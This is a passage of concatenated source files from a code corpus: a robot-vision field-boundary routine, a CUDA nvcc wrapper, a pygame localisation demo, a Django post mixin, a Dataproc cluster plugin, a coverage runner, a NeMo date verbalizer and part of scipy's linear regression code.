(roi * kernel).sum() # uncomment when using a kernel if roi_mean > green_threshold: # is the roi green enough? # the value is green enough, therefore the field_boundary is somewhere above this point # the area left to search can be halved by setting the new "last" above "y_current" last = y_step - 1 else: # the value isn't green enough, therefore the field_boundary is somewhere below this point # the area left to search can be halved by setting the new "first" below "y_current" first = y_step + 1 # During binary search the field_boundary is either approached from the bottom or from the top. # When approaching the field_boundary from the top, # y_step stops one step above the field_boundary on a non green point. # Therefore the y_step has to be increased when it stops on a non green point. if roi_mean <= green_threshold: y_step += 1 # calculate the y coordinate in the image of the y_step the topmost green pixel was found on with an offset # of roi_height, as the region of interest extends this far below the point y_image = int(round(y_step * y_stepsize)) + roi_current_height_y _field_boundary_points.append((x_image - roi_max_radius_x, y_image)) return _field_boundary_points
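# --- Hedged usage sketch (appended; not part of the original module) ---
# Minimal, illustrative call of one of the algorithms above with a stub colour
# detector; the real detector comes from bitbots_vision and is assumed here
# only as an object exposing get_mask_image().
if __name__ == "__main__":
    import numpy as np

    class _StubFieldColorDetector(object):
        """Hypothetical stand-in: the lower half of the image is 'green' (255)."""
        def __init__(self, height, width):
            self._mask = np.zeros((height, width), dtype=np.uint8)
            self._mask[height // 2:, :] = 255

        def get_mask_image(self):
            return self._mask

    _image = np.zeros((480, 640, 3), dtype=np.uint8)
    _detector = _StubFieldColorDetector(480, 640)
    _points = IterationFieldBoundaryAlgorithm._calculate_field_boundary(
        _image, _detector, _x_steps=30, _y_steps=30,
        _roi_height=10, _roi_width=10, _roi_increase=0.1, _green_threshold=30)
    # Expected: (x, y) tuples with y roughly at half the image height (~240).
    print(_points[:5])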
the-stack_106_24407
#!/usr/bin/env python # Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Crosstool wrapper for compiling CUDA programs with nvcc on Windows. DESCRIPTION: This script is the Windows version of //third_party/gpus/crosstool/crosstool_wrapper_is_not_gcc """ from __future__ import print_function from argparse import ArgumentParser import os import subprocess import re import sys import pipes # Template values set by cuda_autoconf. CPU_COMPILER = ('/opt/rh/devtoolset-7/root/usr/bin/gcc') GCC_HOST_COMPILER_PATH = ('/opt/rh/devtoolset-7/root/usr/bin/gcc') NVCC_PATH = '/usr/local/cuda-10.0/bin/nvcc' NVCC_VERSION = '10.0' NVCC_TEMP_DIR = "C:\\Windows\\Temp\\nvcc_inter_files_tmp_dir" supported_cuda_compute_capabilities = [ "3.0", "6.0" ] def Log(s): print('gpus/crosstool: {0}'.format(s)) def GetOptionValue(argv, option): """Extract the list of values for option from options. Args: option: The option whose value to extract, without the leading '/'. Returns: 1. A list of values, either directly following the option, (eg., /opt val1 val2) or values collected from multiple occurrences of the option (eg., /opt val1 /opt val2). 2. The leftover options. """ parser = ArgumentParser(prefix_chars='/') parser.add_argument('/' + option, nargs='*', action='append') args, leftover = parser.parse_known_args(argv) if args and vars(args)[option]: return (sum(vars(args)[option], []), leftover) return ([], leftover) def _update_options(nvcc_options): if NVCC_VERSION in ("7.0",): return nvcc_options update_options = { "relaxed-constexpr" : "expt-relaxed-constexpr" } return [ update_options[opt] if opt in update_options else opt for opt in nvcc_options ] def GetNvccOptions(argv): """Collect the -nvcc_options values from argv. Args: argv: A list of strings, possibly the argv passed to main(). Returns: 1. The string that can be passed directly to nvcc. 2. The leftover options. """ parser = ArgumentParser() parser.add_argument('-nvcc_options', nargs='*', action='append') args, leftover = parser.parse_known_args(argv) if args.nvcc_options: options = _update_options(sum(args.nvcc_options, [])) return (['--' + a for a in options], leftover) return ([], leftover) def InvokeNvcc(argv, log=False): """Call nvcc with arguments assembled from argv. Args: argv: A list of strings, possibly the argv passed to main(). log: True if logging is requested. 
Returns: The return value of calling os.system('nvcc ' + args) """ src_files = [f for f in argv if re.search('\.cpp$|\.cc$|\.c$|\.cxx$|\.C$', f)] if len(src_files) == 0: raise Error('No source files found for cuda compilation.') out_file = [ f for f in argv if f.startswith('/Fo') ] if len(out_file) != 1: raise Error('Please sepecify exactly one output file for cuda compilation.') out = ['-o', out_file[0][len('/Fo'):]] nvcc_compiler_options, argv = GetNvccOptions(argv) opt_option, argv = GetOptionValue(argv, 'O') opt = ['-g', '-G'] if (len(opt_option) > 0 and opt_option[0] != 'd'): opt = ['-O2'] include_options, argv = GetOptionValue(argv, 'I') includes = ["-I " + include for include in include_options] defines, argv = GetOptionValue(argv, 'D') defines = ['-D' + define for define in defines] undefines, argv = GetOptionValue(argv, 'U') undefines = ['-U' + define for define in undefines] # The rest of the unrecongized options should be passed to host compiler host_compiler_options = [option for option in argv if option not in (src_files + out_file)] m_options = ["-m64"] nvccopts = ['-D_FORCE_INLINES'] for capability in supported_cuda_compute_capabilities: capability = capability.replace('.', '') nvccopts += [r'-gencode=arch=compute_%s,"code=sm_%s,compute_%s"' % ( capability, capability, capability)] nvccopts += nvcc_compiler_options nvccopts += undefines nvccopts += defines nvccopts += m_options nvccopts += ['--compiler-options="' + " ".join(host_compiler_options) + '"'] nvccopts += ['-x', 'cu'] + opt + includes + out + ['-c'] + src_files # If we don't specify --keep-dir, nvcc will generate intermediate files under TEMP # Put them under NVCC_TEMP_DIR instead, then Bazel can ignore files under NVCC_TEMP_DIR during dependency check # http://docs.nvidia.com/cuda/cuda-compiler-driver-nvcc/index.html#options-for-guiding-compiler-driver # Different actions are sharing NVCC_TEMP_DIR, so we cannot remove it if the directory already exists. if os.path.isfile(NVCC_TEMP_DIR): os.remove(NVCC_TEMP_DIR) if not os.path.exists(NVCC_TEMP_DIR): os.makedirs(NVCC_TEMP_DIR) nvccopts += ['--keep', '--keep-dir', NVCC_TEMP_DIR] cmd = [NVCC_PATH] + nvccopts if log: Log(cmd) proc = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr, env=os.environ.copy(), shell=True) proc.wait() return proc.returncode def main(): parser = ArgumentParser() parser.add_argument('-x', nargs=1) parser.add_argument('--cuda_log', action='store_true') args, leftover = parser.parse_known_args(sys.argv[1:]) if args.x and args.x[0] == 'cuda': if args.cuda_log: Log('-x cuda') leftover = [pipes.quote(s) for s in leftover] if args.cuda_log: Log('using nvcc') return InvokeNvcc(leftover, log=args.cuda_log) # Strip our flags before passing through to the CPU compiler for files which # are not -x cuda. We can't just pass 'leftover' because it also strips -x. # We not only want to pass -x to the CPU compiler, but also keep it in its # relative location in the argv list (the compiler is actually sensitive to # this). cpu_compiler_flags = [flag for flag in sys.argv[1:] if not flag.startswith(('--cuda_log')) and not flag.startswith(('-nvcc_options'))] return subprocess.call([CPU_COMPILER] + cpu_compiler_flags) if __name__ == '__main__': sys.exit(main())
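# --- Hedged illustration (appended; not part of the original wrapper) ---
# GetOptionValue() gathers the values of a repeated MSVC-style option and
# returns the remaining arguments; the flags and paths below are made up.
def _demo_get_option_value():
    includes, leftover = GetOptionValue(
        ['/I', 'third_party', '/I', 'cuda/include', '/Fo', 'kernel.obj', 'kernel.cc'],
        'I')
    # includes collects both /I values: ['third_party', 'cuda/include'];
    # leftover keeps the unrecognised /Fo output flag and the source file.
    return includes, leftover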
the-stack_106_24408
#! /usr/bin/env python import pygame import sys import random class Robot(object): def __init__ (self): self.pygame = pygame.init() self.screen = pygame.display.set_mode((640,480)) self.x = random.randint(0,9) # robot x position self.y = random.randint(0,9) # robot y position self.z = 0.0 self.zred = 0.0 self.zblue = 0.0 def robot_up(self): """ We call this methode when robot move up """ self.y = self.y - 1 if self.y < 0: self.y = 0 def robot_down(self): """ We call this methode when robot move down """ self.y = self.y + 1 if self.y > 9: self.y = 9 def robot_left(self): """ We call this methode when robot move left """ self.x = self.x - 1 if self.x < 0: self.x = 0 def robot_right(self): """ We call this methode when robot move right """ self.x = self.x + 1 if self.x > 9: self.x = 9 def robot_random_move(self): """ Robot random move """ r = random.randint(1,4) if r == 1 and self.x < 9: self.robot_right() return 1 elif r == 2 and self.x > 0: self.robot_left() return 2 elif r == 3 and self.y > 0: self.robot_up() return 3 elif r == 4 and self.y < 9: self.robot_down() return 4 else: return 5 def display_robot(self): """ Display robot on screen """ self.screen.fill((0,0,0)) blue = (0,0,255) red = (255,0,0) pygame.draw.rect(self.screen,blue,(0,0,640,48)) pygame.draw.rect(self.screen,blue,(0,0,64,480)) pygame.draw.rect(self.screen,red,(640-64,0,64,480)) pygame.draw.rect(self.screen,red,(0,480-48,640,48)) pygame.draw.circle(self.screen,(255,255,255),(self.x*64+32,self.y*48+24),24) pygame.display.update() pygame.time.wait(50) def perception(self): """ Perception whenb robot hit the wall or encounter an obstacle """ self.z = 0.0 self.zred = 0.0 self.zblue = 0.0 if (self.x == 0 or self.y == 0) and random.random() < 0.3: self.zblue = 1.0 if (self.x == 9 or self.y == 9) and random.random() < 0.3: self.zred = 1.0 if (self.x == 0 or self.y == 0 or self.x == 9 or self.y == 9) and random.random() < 0.3: self.z = 1.0 def display_probability_map(self,p): """ Display robot probability map for localisation """ self.screen.fill((0,0,0)) for j in range(0,10): for i in range(0,10): pygame.draw.rect(self.screen,(50+205*p[i][j],0,50+205*p[i][j]),(i*64,j*48,64,48)) pygame.draw.circle(self.screen,(255,255,255),(self.y*64+32,self.x*48+24),24) pygame.display.update() pygame.time.wait(50) def init_probability_map(self): """ Initialisation of probability map by 0.10 for each cell of the table""" #0.10 should be 0.1 . 
Each line probalility should be equal to 1 (0.1 * 10 = 1) #with 0.10 we can see the color difference between the screen and probabily map in display_probability_ma i = 10 j = 10 return [[0.10 for x in range(j)] for y in range(j)] ################## LOCALISATION #################### def move_right(self, p): """ When robot move rigth, the probability that it is on left is zero (0) we move probability of each cell like p[9][9]= p[9][8], p[8][9]= p[8][8] and put zero on the left column of probability table """ i = 9 j = 9 while i > 0: while j > -1: p[j][i] = p[j][i-1] j = j - 1 j = 9 i = i - 1 for i in range(10): p[i][0] = 0 # Put zero on the left column of probability table def move_left(self, p): """ When robot move left, the probability that it is on right is zero (0) we move probability of each cell like p[0][0]= p[0][1], p[1][0]= p[1][1] and put zero on the right column of probability table """ i = 0 j = 0 while i < 9: while j < 10: p[j][i] = p[j][i+1] j = j + 1 j = 0 i = i + 1 for i in range(10): p[i][9] = 0 # Put zero on the left column of probability table def move_up(self, p): """ When robot move up, the probability that it is on down is zero (0) we move probability of each cell like p[0][0]= p[1][0], p[0][1]= p[1][1] and put zero on the down column of probability table """ i = 0 j = 0 while i < 9: while j < 10: p[i][j] = p[i+1][j] j = j + 1 j = 0 i = i + 1 for i in range(10): p[9][i] = 0 # Put zero on the down column of probability table def move_down(self, p): """ When robot move down, the probability that it is on up is zero (0) we move probability of each cell like p[9][9]= p[8][9], p[9][8]= p[8][9] and put zero on the up column of probability table """ i = 9 j = 9 while i > 0: while j > -1: p[i][j] = p[i-1][j] j = j - 1 j = 9 i = i - 1 for i in range(10): p[0][i] = 0 # Put zero on the up column of probability table def localisation(self,m, p): """ Localisation """ if m == 1 : self.move_right(p) elif m == 2 : self.move_left(p) elif m == 3 : self.move_up(p) elif m == 4: self.move_down(p) def display_prob(self, p): """ Display probability map """ for i in range(10): for j in range(10): print(p[i][j], end=' ') print('\n') def main (): """Main function""" rt = Robot() p = rt.init_probability_map() while True: #rt.display_robot() rt.display_probability_map(p) m = rt.robot_random_move() rt.perception() rt.localisation(m,p) #print("x : " +str(rt.x)) #print("y : " +str(rt.y)) #rt.display_prob(p) #print(m) #print("Perception: I receive: "+str(rt.z)) if __name__ == "__main__": main()
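# --- Hedged illustration (appended; never called by the script above) ---
# The localisation update is a pure shift of the probability grid: after
# move_right() every entry p[j][i] takes the value of p[j][i-1] and column 0
# is zeroed. Constructing Robot() opens a pygame window, so this helper is
# only defined here, not executed.
def _demo_move_right_shift():
    rt = Robot()
    p = rt.init_probability_map()
    p[0][0] = 1.0
    rt.move_right(p)
    assert p[0][1] == 1.0 and p[0][0] == 0  # mass shifted one cell, border cleared
    return p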
the-stack_106_24409
from data.models import Comment, Post, User from django.db.models import Q from .. import remote_request class PostListMixin(object): def preprocess(self, request, *args, **kwargs): posts = Post.objects.none() user = None if 'post_list_filter' in kwargs: if request.user.is_authenticated(): user = User.objects.get(email=request.user) posts = self.get_filtered_list(kwargs['post_list_filter'], user) if isinstance(posts, Post): setattr(posts, 'comments', Comment.objects.filter(post=posts).all()) else: for index, post in enumerate(posts): setattr(posts[index], 'comments', Comment.objects.filter(post=post).all()) self.context['post_list'] = posts super(PostListMixin, self).preprocess(request, *args, **kwargs) def get_filtered_list(self, filter, user): filtered_list = Post.objects.all() if 'visible' in filter: # /author/posts filtered_list = self.get_posts_visible_to_current_user(user) elif 'public' in filter: # /posts filtered_list = self.get_all_public_posts() elif 'visible_by_author' in filter: # /author/<author_id>/posts author = User.objects.get(guid=filter['visible_by_author']) filtered_list = self.get_posts_by_author(author, user) elif 'post_id' in filter: # /posts/<post_id> try: filtered_list = Post.objects.get(guid=filter['post_id']) except: filtered_list = Post.objects.none() return filtered_list def get_posts_visible_to_current_user(self, user): # add all posts by current user vis_posts = [p for p in Post.objects.filter(author=user)] # add all public posts vis_posts.extend([p for p in self.get_all_public_posts() if p not in vis_posts]) # add all posts by friends, visible to friends friend_list = self.context['friend_list'] for f in friend_list: vis_posts.extend([p for p in Post.objects.filter( Q(author=f) & Q(visibility='FRIENDS')) if p not in vis_posts]) # get FOAF posts foaf_list = self.context['foaf_list'] for f in foaf_list: vis_posts.extend([p for p in Post.objects.filter( Q(author=f) & Q(visibility='FOAF')) if p not in vis_posts]) return vis_posts def get_all_public_posts(self): posts = Post.objects.filter(visibility='PUBLIC') remote_posts = remote_request.getRemoteObject(None, "posts") post_list = list(posts) if remote_posts: for post in remote_posts: post_list.append(post) return posts def get_posts_by_author(self, author, user): posts = self.get_posts_visible_to_current_user(user) posts = [p for p in posts if p.author == author] return posts
the-stack_106_24410
import dku_dataproc from gce_client import DataProcClient import os, json, argparse, logging from dataiku.cluster import Cluster logging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s', level=logging.INFO) logging.getLogger().setLevel(logging.INFO) class MyCluster(Cluster): def __init__(self,cluster_id, cluster_name,config, plugin_config): self.cluster_name = cluster_name self.config = config self.plugin_config = plugin_config self.client = None self.cluster_id = config.get("gcloudClusterId") or cluster_id return def __init_client__(self): logging.info("loading dataproc client") if not self.client: self.client = DataProcClient(self.config.get("gcloudProjectId") ,asumeDefaultCredentials=self.config.get("gcloudUseDefaultSvcAccount") ,service_account_details=self.config.get("gcloudGoogleServiceAccountKey") ) self.client.region = self.config.get("gcloudRegionId") self.client.zone = self.config.get("gcloudZoneId") return def start(self): logging.info("starting cluster") self.__init_client__() full_name = "DSS cluster name=%s" % (self.cluster_name) name = self.cluster_id logging.info("starting cluster, name=%s" % (full_name)) clusterBody = self.client.dump(name) self.client.dump(name) # handling subnets and IP configuration if self.config.get("gcloudUseCustomGceConfig"): clusterBody["config"]["gceClusterConfig"] = self.config.get("gcloudCustomGceConfig") else: if self.config.get("gcloudUseCustomSubnet"): clusterBody["config"]["gceClusterConfig"] = { 'zoneUri': self.config.get("gcloudZoneId"), "subnetworkUri": self.config.get("gcloudCustomSubnetId"), "internalIpOnly": self.config.get("gcloudUseInternalIP") } else: clusterBody["config"]["gceClusterConfig"]["internalIpOnly"] = self.config.get("gcloudUseInternalIP") # set network tags to cluster tagsAsString = self.config.get("gcloudNetworkTags") if tagsAsString: clusterBody["config"]["gceClusterConfig"]["tags"] = tagsAsString.split(",") clusterBody = self.client.dump(name) self.client.dump(name) clusterBody["config"]["masterConfig"]['machineTypeUri'] = self.config.get("masterInstanceType") clusterBody["config"]["workerConfig"]['machineTypeUri'] = self.config.get("slaveInstanceType") clusterBody["config"]["workerConfig"]['numInstances'] = int(self.config["instancesCount"]) if self.config.get("dataprocVersion") != "LATEST": clusterBody["config"]["softwareConfig"]['imageVersion'] = self.config.get("dataprocVersion") props = {} if self.config["metastoreDBMode"] == "CUSTOM_JDBC": props = { "javax.jdo.option.ConnectionURL" : self.config["metastoreJDBCURL"], "javax.jdo.option.ConnectionDriverName": self.config["metastoreJDBCDriver"], "javax.jdo.option.ConnectionUserName": self.config["metastoreJDBCUser"], "javax.jdo.option.ConnectionPassword": self.config["metastoreJDBCPassword"], } logging.imfo(" setting hive metastore for custom JDBC") self.client.setHiveConfToClusterDef(clusterBody,props) elif self.config["metastoreDBMode"] == "MYSQL": props = { "javax.jdo.option.ConnectionURL" : "jdbc:mysql://%s:3306/hive?createDatabaseIfNotExist=true" % self.config["metastoreMySQLHost"], "javax.jdo.option.ConnectionDriverName": "org.mariadb.jdbc.Driver", "javax.jdo.option.ConnectionUserName": self.config["metastoreMySQLUser"], "javax.jdo.option.ConnectionPassword": self.config["metastoreMySQLPassword"] } logging.imfo(" setting hive metastore for MySQL") self.client.setHiveConfToClusterDef(clusterBody,props) elif self.config["metastoreDBMode"] == "GCLOUD_SQL": 
self.client.setHiveMetastoreToGoogleSql(clusterBody,instanceName,projectId=None,region=None,extraProps={}) # Building Dataproc cluster self.client.run(name,clusterBody) logging.info("waiting for cluster to start") self.client.waitForStatus(name) return dku_dataproc.make_cluster_keys_and_data(self.client, self.cluster_id,clusterBody=clusterBody, create_user_dir=True, create_databases=self.config.get("databasesToCreate")) def stop(self, data): """ Stop the cluster :param data: the dict of data that the start() method produced for the cluster """ logging.info("Deleting cluster {}".format(self.cluster_id)) self.__init_client__() self.client.terminate(data["dataprocClusterId"]) return
the-stack_106_24413
#!/usr/bin/env python import os import sys import pathlib import subprocess import shutil import itertools def main(): exit_status = 0 assert pathlib.Path.cwd().resolve() == pathlib.Path(__file__).parent.resolve(), \ f"Please run {__file__} from ALIGN_HOME." argv = sys.argv[1:] output_dir = pathlib.Path('coverage-reports').resolve() c_coverage_file = pathlib.Path('coverage.info').resolve() try: from tests._cmake import CMAKE_BINARY_DIR, CMAKE_SOURCE_DIR except: CMAKE_BINARY_DIR=None CMAKE_SOURCE_DIR=None # Detect whether to run LCOV GCOV_ENABLED = False if shutil.which('lcov') is None: print("WARNING: `lcov` not found. Generating coverage for python components only.") elif not CMAKE_BINARY_DIR or not CMAKE_SOURCE_DIR: print("WARNING: CPP Source / Binary information not found. Generating coverage for python components only.") print(" Run `pip install -e .[test] --no-build-isolation --install-option='-DCODE_COVERAGE=ON'` to instrument cpp code.") elif next(pathlib.Path(CMAKE_BINARY_DIR).glob('**/*.gcno'), None) is None: print("WARNING: Could not find any .gcno files. Generating coverage for python components only.") print(" Run `pip install -e .[test] --no-build-isolation --install-option='-DCODE_COVERAGE=ON'` to instrument cpp code.") else: print("INFO: Code coverage for cpp extension has been enabled. Please see coverage-reports/cpp.") GCOV_ENABLED = True # Clean existing report (if any) if output_dir.is_dir(): shutil.rmtree(str(output_dir)) # Number of parallel jobs if 'MAX_JOBS' in os.environ: MAX_JOBS = os.environ['MAX_JOBS'] else: MAX_JOBS = 'auto' # LCOV init if GCOV_ENABLED: ret = subprocess.run(' '.join([ 'lcov', '--directory', CMAKE_BINARY_DIR, '--zerocounters']), shell=True) if not exit_status: exit_status = ret.returncode # Actual command is run here ret = subprocess.run(' '.join([ 'pytest', '-vv', # Call pytest in verbose mode '-n', MAX_JOBS, # pytest-xdist options '--cov-report', f'html:{output_dir}/python', '--cov=align', # pytest-cov options *argv ]), shell=True) if not exit_status: exit_status = ret.returncode if GCOV_ENABLED: # Finish capture ret = subprocess.run(' '.join([ 'lcov', '--capture', '--no-external', '--directory', '.', '--output-file', f'{c_coverage_file}']), shell=True) if not exit_status: exit_status = ret.returncode # Remove coverage we aren't interested in ret = subprocess.run(' '.join([ 'lcov', '--remove', f'{c_coverage_file}', '--output-file', f'{c_coverage_file}', '*/_deps/*']), shell=True) if not exit_status: exit_status = ret.returncode # Generate report ret = subprocess.run(' '.join([ 'genhtml', f'{c_coverage_file}', '--output-directory', f'{output_dir}/cpp', '--no-branch-coverage', '--title', '"CPP lcov report"']), shell=True) if not exit_status: exit_status = ret.returncode return exit_status if __name__ == '__main__': sys.exit(main())
the-stack_106_24414
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. # Copyright 2015 and onwards Google, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from nemo_text_processing.text_normalization.en.graph_utils import ( NEMO_NOT_QUOTE, GraphFst, delete_extra_space, delete_space, ) try: import pynini from pynini.lib import pynutil PYNINI_AVAILABLE = True except (ModuleNotFoundError, ImportError): PYNINI_AVAILABLE = False class DateFst(GraphFst): """ Finite state transducer for verbalizing date, e.g. date { month: "february" day: "five" year: "twenty twelve" preserve_order: true } -> february fifth twenty twelve date { day: "five" month: "february" year: "twenty twelve" preserve_order: true } -> the fifth of february twenty twelve Args: ordinal: OrdinalFst deterministic: if True will provide a single transduction option, for False multiple transduction are generated (used for audio-based normalization) """ def __init__(self, ordinal: GraphFst, deterministic: bool = True): super().__init__(name="date", kind="verbalize", deterministic=deterministic) month = pynini.closure(NEMO_NOT_QUOTE, 1) day_cardinal = ( pynutil.delete("day:") + delete_space + pynutil.delete("\"") + pynini.closure(NEMO_NOT_QUOTE, 1) + pynutil.delete("\"") ) day = day_cardinal @ ordinal.suffix if not deterministic: day |= day_cardinal month = pynutil.delete("month:") + delete_space + pynutil.delete("\"") + month + pynutil.delete("\"") year = ( pynutil.delete("year:") + delete_space + pynutil.delete("\"") + pynini.closure(NEMO_NOT_QUOTE, 1) + delete_space + pynutil.delete("\"") ) # month (day) year graph_mdy = ( month + pynini.closure(delete_extra_space + day, 0, 1) + pynini.closure(delete_extra_space + year, 0, 1) ) # day month year graph_dmy = ( pynutil.insert("the ") + day + delete_extra_space + pynutil.insert("of ") + month + pynini.closure(delete_extra_space + year, 0, 1) ) optional_preserve_order = pynini.closure( pynutil.delete("preserve_order:") + delete_space + pynutil.delete("true") + delete_space | pynutil.delete("field_order:") + delete_space + pynutil.delete("\"") + NEMO_NOT_QUOTE + pynutil.delete("\"") + delete_space ) final_graph = ( (graph_mdy | year | pynutil.add_weight(graph_dmy, 0.001)) + delete_space + optional_preserve_order ) delete_tokens = self.delete_tokens(final_graph) self.fst = delete_tokens.optimize()
the-stack_106_24417
from dataIO import fileIO
import os

false_strings = ["false", "False", "f", "F", "0", ""]

if fileIO("data.json", "check"):
    data_json = fileIO("data.json", "load")
else:
    data_json = {
        "Twitter": {
            "consumer_key": os.environ["CONSUMER_KEY"],
            "consumer_secret": os.environ["CONSUMER_SECRET"],
            "access_token": os.environ["ACCESS_TOKEN"],
            "access_token_secret": os.environ["ACCESS_TOKEN_SECRET"]
        },
        "Discord": [
            {
                "IncludeReplyToUser": False,
                "IncludeRetweet": False,
                "IncludeUserReply": False,
                "webhook_urls": os.environ.get("WEBHOOK_URL", []).replace(" ", "").split(","),
                "twitter_ids": os.environ.get("TWITTER_ID", []).replace(" ", "").split(",")
            }
        ],
        "twitter_ids": []
    }
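# --- Hedged example (appended; not part of the original config module) ---
# If the defaults built above should be written back to disk, the same dataIO
# helper could be used; the "save" mode is an assumption made by analogy with
# the "check" and "load" modes used above.
def _save_default_config():
    fileIO("data.json", "save", data_json)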
the-stack_106_24418
import numpy as np import scipy.stats._stats_py from . import distributions from .._lib._bunch import _make_tuple_bunch __all__ = ['_find_repeats', 'linregress', 'theilslopes', 'siegelslopes'] # This is not a namedtuple for backwards compatibility. See PR #12983 LinregressResult = _make_tuple_bunch('LinregressResult', ['slope', 'intercept', 'rvalue', 'pvalue', 'stderr'], extra_field_names=['intercept_stderr']) def linregress(x, y=None, alternative='two-sided'): """ Calculate a linear least-squares regression for two sets of measurements. Parameters ---------- x, y : array_like Two sets of measurements. Both arrays should have the same length. If only `x` is given (and ``y=None``), then it must be a two-dimensional array where one dimension has length 2. The two sets of measurements are then found by splitting the array along the length-2 dimension. In the case where ``y=None`` and `x` is a 2x2 array, ``linregress(x)`` is equivalent to ``linregress(x[0], x[1])``. alternative : {'two-sided', 'less', 'greater'}, optional Defines the alternative hypothesis. Default is 'two-sided'. The following options are available: * 'two-sided': the slope of the regression line is nonzero * 'less': the slope of the regression line is less than zero * 'greater': the slope of the regression line is greater than zero .. versionadded:: 1.7.0 Returns ------- result : ``LinregressResult`` instance The return value is an object with the following attributes: slope : float Slope of the regression line. intercept : float Intercept of the regression line. rvalue : float The Pearson correlation coefficient. The square of ``rvalue`` is equal to the coefficient of determination. pvalue : float The p-value for a hypothesis test whose null hypothesis is that the slope is zero, using Wald Test with t-distribution of the test statistic. See `alternative` above for alternative hypotheses. stderr : float Standard error of the estimated slope (gradient), under the assumption of residual normality. intercept_stderr : float Standard error of the estimated intercept, under the assumption of residual normality. See Also -------- scipy.optimize.curve_fit : Use non-linear least squares to fit a function to data. scipy.optimize.leastsq : Minimize the sum of squares of a set of equations. Notes ----- Missing values are considered pair-wise: if a value is missing in `x`, the corresponding value in `y` is masked. For compatibility with older versions of SciPy, the return value acts like a ``namedtuple`` of length 5, with fields ``slope``, ``intercept``, ``rvalue``, ``pvalue`` and ``stderr``, so one can continue to write:: slope, intercept, r, p, se = linregress(x, y) With that style, however, the standard error of the intercept is not available. 
To have access to all the computed values, including the standard error of the intercept, use the return value as an object with attributes, e.g.:: result = linregress(x, y) print(result.intercept, result.intercept_stderr) Examples -------- >>> import matplotlib.pyplot as plt >>> from scipy import stats >>> rng = np.random.default_rng() Generate some data: >>> x = rng.random(10) >>> y = 1.6*x + rng.random(10) Perform the linear regression: >>> res = stats.linregress(x, y) Coefficient of determination (R-squared): >>> print(f"R-squared: {res.rvalue**2:.6f}") R-squared: 0.717533 Plot the data along with the fitted line: >>> plt.plot(x, y, 'o', label='original data') >>> plt.plot(x, res.intercept + res.slope*x, 'r', label='fitted line') >>> plt.legend() >>> plt.show() Calculate 95% confidence interval on slope and intercept: >>> # Two-sided inverse Students t-distribution >>> # p - probability, df - degrees of freedom >>> from scipy.stats import t >>> tinv = lambda p, df: abs(t.ppf(p/2, df)) >>> ts = tinv(0.05, len(x)-2) >>> print(f"slope (95%): {res.slope:.6f} +/- {ts*res.stderr:.6f}") slope (95%): 1.453392 +/- 0.743465 >>> print(f"intercept (95%): {res.intercept:.6f}" ... f" +/- {ts*res.intercept_stderr:.6f}") intercept (95%): 0.616950 +/- 0.544475 """ TINY = 1.0e-20 if y is None: # x is a (2, N) or (N, 2) shaped array_like x = np.asarray(x) if x.shape[0] == 2: x, y = x elif x.shape[1] == 2: x, y = x.T else: raise ValueError("If only `x` is given as input, it has to " "be of shape (2, N) or (N, 2); provided shape " f"was {x.shape}.") else: x = np.asarray(x) y = np.asarray(y) if x.size == 0 or y.size == 0: raise ValueError("Inputs must not be empty.") if np.amax(x) == np.amin(x) and len(x) > 1: raise ValueError("Cannot calculate a linear regression " "if all x values are identical") n = len(x) xmean = np.mean(x, None) ymean = np.mean(y, None) # Average sums of square differences from the mean # ssxm = mean( (x-mean(x))^2 ) # ssxym = mean( (x-mean(x)) * (y-mean(y)) ) ssxm, ssxym, _, ssym = np.cov(x, y, bias=1).flat # R-value # r = ssxym / sqrt( ssxm * ssym ) if ssxm == 0.0 or ssym == 0.0: # If the denominator was going to be 0 r = 0.0 else: r = ssxym / np.sqrt(ssxm * ssym) # Test for numerical error propagation (make sure -1 < r < 1) if r > 1.0: r = 1.0 elif r < -1.0: r = -1.0 slope = ssxym / ssxm intercept = ymean - slope*xmean if n == 2: # handle case when only two points are passed in if y[0] == y[1]: prob = 1.0 else: prob = 0.0 slope_stderr = 0.0 intercept_stderr = 0.0 else: df = n - 2 # Number of degrees of freedom # n-2 degrees of freedom because 2 has been used up # to estimate the mean and standard deviation t = r * np.sqrt(df / ((1.0 - r + TINY)*(1.0 + r + TINY))) t, prob = scipy.stats._stats_py._ttest_finish(df, t, alternative) slope_stderr = np.sqrt((1 - r**2) * ssym / ssxm / df) # Also calculate the standard error of the intercept # The following relationship is used: # ssxm = mean( (x-mean(x))^2 ) # = ssx - sx*sx # = mean( x^2 ) - mean(x)^2 intercept_stderr = slope_stderr * np.sqrt(ssxm + xmean**2) return LinregressResult(slope=slope, intercept=intercept, rvalue=r, pvalue=prob, stderr=slope_stderr, intercept_stderr=intercept_stderr) def theilslopes(y, x=None, alpha=0.95, method='separate'): r""" Computes the Theil-Sen estimator for a set of points (x, y). `theilslopes` implements a method for robust linear regression. It computes the slope as the median of all slopes between paired values. Parameters ---------- y : array_like Dependent variable. 
x : array_like or None, optional Independent variable. If None, use ``arange(len(y))`` instead. alpha : float, optional Confidence degree between 0 and 1. Default is 95% confidence. Note that `alpha` is symmetric around 0.5, i.e. both 0.1 and 0.9 are interpreted as "find the 90% confidence interval". method : {'joint', 'separate'}, optional Method to be used for computing estimate for intercept. Following methods are supported, * 'joint': Uses np.median(y - medslope * x) as intercept. * 'separate': Uses np.median(y) - medslope * np.median(x) as intercept. The default is 'separate'. .. versionadded:: 1.8.0 Returns ------- medslope : float Theil slope. medintercept : float Intercept of the Theil line. lo_slope : float Lower bound of the confidence interval on `medslope`. up_slope : float Upper bound of the confidence interval on `medslope`. See Also -------- siegelslopes : a similar technique using repeated medians Notes ----- The implementation of `theilslopes` follows [1]_. The intercept is not defined in [1]_, and here it is defined as ``median(y) - medslope*median(x)``, which is given in [3]_. Other definitions of the intercept exist in the literature such as ``median(y - 